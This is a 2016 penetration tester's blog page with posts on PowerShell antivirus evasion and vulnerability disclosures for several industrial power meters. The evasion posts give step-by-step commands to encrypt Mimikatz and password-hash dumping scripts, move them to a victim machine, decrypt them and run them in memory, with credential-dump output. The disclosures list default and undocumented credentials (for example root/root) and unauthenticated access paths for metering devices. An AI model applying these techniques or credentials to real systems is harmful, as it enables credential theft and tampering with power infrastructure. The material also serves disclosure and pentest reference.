Wednesday, October 19, 2016

New Powershell Mass Encrypt and Decrypt modules

New Powershell Mass Encrypt and Decrypt modules

These scripts are sourced from / wrappers around PowerSploit's Out-Encrypted.ps1 script.

PowerSploit's Out-Encrypted.ps1 handles / encrypts one script at a time; encrypted file needs to be decrypted manually and then executed.

Using PS-MassEncScript.ps1, encrypt multiple scripts with a password and a salt value, in one go.

Move the encrypted files over to the target / compromised box. Since these files are encrypted, AV / IPS are no good - at least as of now.

Use PS-DecScript.ps1 to decrypt & execute any of these encrypted files.

See the example script runs below:

On Attacker's box

C:\ps_stuff>dir *.ps1
 Volume in drive C has no label.
 Volume Serial Number is 6CCE-B154

 Directory of C:\ps_stuff

10/19/2016  06:51 AM             4,850 Out-EncryptedScript.ps1
10/06/2016  04:42 AM             1,663 PS-DecScript.ps1
10/19/2016  01:56 AM             3,267 PS-MassEncScript.ps1
               3 File(s)          9,780 bytes
               0 Dir(s)  45,774,680,064 bytes free

C:\ps_stuff>dir scripts            <--- directory where all scripts to be encrypted are stored
 Volume in drive C has no label.
 Volume Serial Number is 6CCE-B154

 Directory of C:\ps_stuff\scripts

10/19/2016  07:07 AM    <DIR>          .
10/19/2016  07:07 AM    <DIR>          ..
09/09/2016  12:06 PM             8,863 Get-LSASecret.ps1
09/09/2016  11:46 AM            14,948 Get-PassHashes.ps1
09/09/2016  11:38 AM         1,271,440 Invoke-Mimikatz.ps1
               3 File(s)      1,295,251 bytes
               2 Dir(s)  45,776,424,960 bytes free


Normally, an AV will immediately flag these scripts, remove and / or block script execution.

Encrypt these scripts using PS-MassEncScript.

Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\ps_stuff> 

Step 1 -> Import PS-MassEncScript.ps1
PS C:\ps_stuff> Import-Module C:\ps_stuff\PS-MassEncScript.ps1

Step 2 -> Execute PS-MassEncScript.ps1 with 4 parameters
PS C:\ps_stuff> PS-MassEncScript C:\ps_stuff\Out-EncryptedScript.ps1 C:\ps_stuff\scripts password salt

argument 1 -> C:\ps_stuff\Out-EncryptedScript.ps1 -> path to Out-EncryptedScript.ps1
argument 2 -> C:\ps_stuff\scripts -> path to scripts that you want to encrypt
argument 3 -> password
argument 4 -> salt

PS C:\ps_stuff> dir .\scripts

    Directory: C:\ps_stuff\scripts

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---          9/9/2016  12:06 PM       8863 Get-LSASecret.ps1
-a---        10/19/2016   7:10 AM      12809 Get-LSASecret_evil.ps1
-a---          9/9/2016  11:46 AM      14948 Get-PassHashes.ps1
-a---        10/19/2016   7:10 AM      20925 Get-PassHashes_evil.ps1
-a---          9/9/2016  11:38 AM    1271440 Invoke-Mimikatz.ps1
-a---        10/19/2016   7:10 AM    1696253 Invoke-Mimikatz_evil.ps1

PS C:\ps_stuff>

As you see above, the output encrypted scripts will be appended with a _evil suffix.

On the victim box:

Assuming you already have a cmd shell access, move these encrypted files on the victim box.

.\PS-Decrypt.ps1 <evil script name> password salt 'Command passed to evil ps1 script'

PS C:\victim> .\PS-DecScript.ps1 .\Invoke-Mimikatz_evil.ps1 password salt 'Inv
oke-Mimikatz -DumpCreds'
Executing .\Invoke-Mimikatz_evil.ps1

  .#####.   mimikatz 2.1 (x86) built on Feb 21 2016 18:42:23
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( )
 '## v ##'             (oe.eo)
  '#####'                                     with 17 modules * * */

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 117741 (00000000:0001cbed)
Session           : Interactive from 1
User Name         : Administrator
Domain            : win7ent-01-lab
Logon Server      : WIN7ENT-01-LAB
Logon Time        : 10/19/2016 6:47:25 AM
SID               : S-1-5-21-3784992239-1999550448-2462781864-500
        msv :

PS C:\victim> .\PS-DecScript.ps1 .\Get-PassHashes_evil.ps1 password salt 'Get-
Executing .\Get-PassHashes_evil.ps1
<hash dump>

PS C:\victim>


Thursday, September 15, 2016

[ICS] BINOM3 Electric Power Quality Meter - Multiple Vulnerabilities

[ICS] Universal multifunctional Electric Power Quality Meter BINOM3 - Multiple Vulnerabilities


The meters are designed for autonomous operation in automated systems: 
• SCADA systems
• Data aquisition and transmission systems
• Automated data and measurement systems for revenue and technical power metering 
• Power quality monitoring and control systems
• Automated process control systems, Management information system

Submitted to ICS-CERT - May 25, 2016
No response from vendor till date.
Vulnerability Information

Web Management Portal

1. Reflected XSS – multiple urls, parameters 
Successful exploitation of this vulnerability could allow an unauthenticated and authenticated, attacker to inject arbitrary JavaScript in a specially crafted URL request where the response containing user data is returned to the web browser without being made safe to display.

2. Stored XSS – multiple urls, parameters 
Successful exploitation of this vulnerability could allow an authenticated attacker to inject arbitrary JavaScript in specific input fields, which get stored in the underlying db, and once accessed, the data including malicious scripts, is returned to the web browser leading to script execution.

3. Weak Credentials Management 
The device comes configured with four (4) login accounts:
- admin / 1 
- user / 1 
- alg / 1 
- telem / 1

- These passwords do not meet even basic security criterion.
- To further make it easier for attacker(s), the application design does not provide the users, any option to change their own passwords in device management portal. Only 'root' can change passwords for all other accounts. (AFAIK)

4. Undocumented root account 
In addition to the above four documented login accounts, there is a 'root' superuser account:
- root / root
- root account details are not documented in the device administration guide or manuals
- root account has multiple, additional functions accessible like user management

5. Sensitive Information stored in clear-text 
Sensitive information, specifically, the account passwords, are all stored and shown in clear-text.

Additionally, specific non-root, non-privileged users can access complete device configuration file, which contains clear-text passwords and other config information. This flaw can be used to gain privileged access to the device.

6. Vulnerable to Cross-Site Request Forgery 

There is no CSRF Token generated per page and / or per (sensitive) function. Successful exploitation of this vulnerability can allow silent execution of unauthorized actions on the device such as configuration parameter changes, and saving modified configuration. 

7. Sensitive information leakage

Every time ‘root’ logs in, a GET request is made to a specific url to access password configuration file.

Response comes as xml data, and contains all accounts and their passwords. Since, by default, the management portal is configured for HTTP, a suitably positioned attacked can sniff all login credentials, and gain privileged access.


1. Access Control Flaws 
By default, password authentication is not enabled on Telnet access (AFAIK).
- This access gives superuser-level access to device
- Access to the device provides detailed info on application, configuration, device file system, databases (including Energy & billing), consumption, Statistics, network information, as well as clear-text creds (FTP)
- Easy vector to device & data compromise


Saturday, September 10, 2016

[Quick Notes] Powersploit - AV Evasion

[Quick Notes] Powersploit - AV Evasion

On my pentest engagements, I primarily use Powershell (PS) & PS based exploitation tools & frameworks like CME, Empire, Powersploit, Nishang, Veil, etc, along with Metasploit & other tools.

This short writeup is one of the AV evasion scenarios. Posting here for reference.

Objective is to dump hashes & clear-text passwords from memory (use Mimikatz). Any decent Anti-Virus blocks any attempts to read / update / execute Invoke-Mimikatz.ps1.

Enter - PowerSploit's Out-EncryptedScript.ps1. Use the script to encrypt the any malicious file (text/ps1) offline (attacker's box) and upload it to the target. The script takes in a password and a salt to encrypt the file.

Out-EncryptedScript will encrypt a script (or any text file for thatmatter) and output the results to a minimally obfuscated script -evil.ps1 by default.
Out-EncryptedScript .\Invoke-Mimikatz.ps1 password salty

A new, encrypted ps script - evil.ps1 - is generated.

Read the file contents and execute the script from memory.
[String] $cmd = Get-Content .\evil.ps1Invoke-Expression $cmd$decrypted = de password saltyiex $decrypted; Invoke-Mimikatz -DumpCreds

Invoke-Mimikatz.ps1 executes successfully.


Tuesday, September 6, 2016

[ICS] ELNet Energy meter & Electrical powermeter - multiple vulnerabilities

ELNet Energy meter & Electrical Powermeter - Multiple Vulnerabilities

Powermeter with color graphic display for all electrical measurements and harmonics, with TCP/IP and RS485 communication (ModBus and Bacnet), panel mounted 96X96 mm.

Product Description
Simple operated menus.
  • Multilingual support.
  • Up to One year of energy data logging.
  • Displays up to 64th Harmonic in Waveform or Graphic.
  • 1600 samples per cycle.
  • Accuracy 0.2 %.
  • Accuracy 0.1% with special calibration, that can be ordered.
  • Build in T.O.U. Energy meter.
  • RS485 Communication Port (MODBUS, Bacnet MS/TP).
  • State of the art Graphic LCD
  • Modern 320 x 240 LCD display.
  • Displays of Waveform and Bar graph.
  • Simple installation- Panel mounted. Dimension: 96×96 mm.
  • Flash memory stores 6 months of energy.
  • TCP/IP communication port + WEB server
  • BacNet TCP/IP
Standard approvals:
IEC 62053-22, IEC 62053-23, IEC 62052-11

Large consumers of electricity e.g. factories, hotels, hospitals, municipalities, need to know the history of their consumption and the quality and the values of the power supply. Details such as Voltage, Current, Power Factor, Hertz, Neutral Current, Energy consumption can be displayed by the ELNet LT
Energy & Powermeter.

An additional feature of the Powermeter is the ability to measure Harmonics. Part of the Electricity Supply Authority’s bill reflects poor or good Harmonics in the consumer’s system, therefore it is in his interest to monitor Harmonics and try to improve it.

The ELNet LT Energy & Powermeter is a compact, multi functional, three-phase Powermeter simple to install and is especially designed to integrate into Building Management Systems. It requires no special mounting and is ideally suited for mounting on the front face of any standard electrical panel.

The Configuration and Setup is menu driven, with password protection.

Reported to vendor - June 2016
- vendor acknowledged the issues & ceased the communication after initial discussion.
Reported to ICS-CERT - July 2016
- acknowledged report

Issues observed

1. Unauthenticated Web Management access

ELNet power meters can be managed via Java applet over a web browser. Meter console and all its functions are accessible.

By default, no authentication is required to access the web console.

2. Weak Credential Management
In order to perform certain specific functions in ELNet power meters, passwords are required. These passwords are, really just a formality.

For example:

Default password code to access Technical Menu for device configuration is –
1 (One)

Default password – 6474
- To reset I,V,F Peak Values
- To display /reset power peak value

It appears that password/code functionality is implemented for the sake of getting the compliance check-list ticked.

Not only the default passwords are poor/weak, the system does not have a mechanism to enforce a mandatory password change.

<rant> What's the need of a password change.? It is just a meter. </rant>

3. Password Recovery Functionality

But what if, just what if, someone does change the default passwords, and forgets??

According to vendor:
It is not recommended to forget your new passwords.

Yeah, wtf.

The manual doesn't seem to document Password Recovery. I didn't find it anyway.

Is this bad? Well, let's say Bob accesses the meter via a browser (applet), uses default passcodes to change all passcodes, resets the stats / data, reboots the meter, and goes back to sipping his moonshine. Would be fun..


[ICS] Multiple vulnerabilities - Powerlogic/Schneider Electric IONXXXX series Smart Meters

Powerlogic/Schneider Electric IONXXXX series - Multiple security issues

Impacted devices:

ION7300 and potentially all IONXXXX models (based off of Powerlogic) 

For example, Power Measurement Ltd. Meter ION 7330V283 ETH ETH7330V274 

Power & Energy Monitoring System 
Compact energy and power quality meters for feeders or critical loads 

The PowerLogic ION7300 series meters help you: 
• reduce energy and operations costs 
• improve power quality, reliability and uptime 
• optimize equipment use 
for optimal management of your electrical installation and greater productivity 

Used in enterprise energy management applications such as feeder monitoring and sub-metering, ION7300 Series meters offer unmatched value, functionality, and ease of use. ION7300 Series meters interface to PowerLogic StrxureWare software or other automation systems to give all users fast information sharing and analysis. 

ION7300 Series meters are an ideal replacement for analogue meters, with a multitude of power and energy measurements, analogue and digital I/O, communication ports, and industry-standard protocols. The ION7330 meter has on-board data storage, emails of logged data, and an optional modem. The ION7350 meter is further augmented by more sophisticated power quality analysis, alarms and a call-back-on-alarm feature. 

- Power monitoring and control operations. 
- Power quality analysis. 
- Cost allocation and billing. 
- Demand and power factor control. 
- Load studies and circuit optimisation. 
- Equipment monitoring and control. 
- Preventive maintenance. 

Rebranded or used as is, by different organizations:

Telus Mobility 
Futureway Communications 
Radiant Communications 
Acadia University 
Loyalist College 
Seneca College 

Universidad Nacional Autonoma de Mexico 

Frontier Communications 
Cox Communications 
Avon Old Farms School 
University of Pennsylvania 
Princeton University 
City of Glenwood Springs, Electric Department 
University of California, Santa Cruz 
City of Thomasville Utilities 
Comcast Cable 
Verizon Wireless 
City Of Hartford 
AT&T Internet Services 
Comcast Business Communications 
AT&T U-verse 

Reported to vendor - May 2016
- vendor team confirmed the issues in multiple models, & vendor poc ceased communication later.

Reported to ICS-CERT - July 2016
- acknowledged the report


HTTP Web Management portal 
Provides stats for Monitor Energy, Revenue, Peak Demand, Voltage Disturbances. 

No access controlby default no Authentication is configured, to access device’s web management portal. 

An unauthorized user can access the device management portal and make config changes. This can further be exploited easily at a mass scale, with scripting, and submitting device configuration changes via a specific POST request. 

I suspect it may also be possible to cause denial of service on these devices, as well as additional devices - which directly or indirectly accept / send data to/from these meters - by submitting varying amounts of invalid / junk data. 

Vulnerable to Cross-Site Request Forgery 

There is no CSRF Token generated per page and / or per (sensitive) function. Successful exploitation of this vulnerability can allow silent execution of unauthorized actions on the device such as configuration parameter changes, and saving modified configuration. 

Successful exploitation of these vulnerabilities allow silent execution of unauthorized actions on the device specifically modifying parameter configurations – voltage modes, polarity, voltage units, current units, interval values -, and submitting configuration changes to meter. 

Front Panel security (Physical) 

Weak Credential Management – Default meter password is factory-set to 00000mandatory default password change is not enforced. 

Front panel meter security lets you configure the meter through the front panel using a meter password. 

Front panel meter security is enabled by default on all ION7300 series meters; all configuration functions in the front panel are password‐protected. 

The password is factory‐set to 0 (zero)


Weak Credentials Management 
- Default accounts - different models come with corresponding login creds - documented in the powerlogic admin guide - 
- Application does not enforce a mandatory default password change 

For example, for ION7300, default creds are: 
User - 7300 
Password – 0 (<— zero)



The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.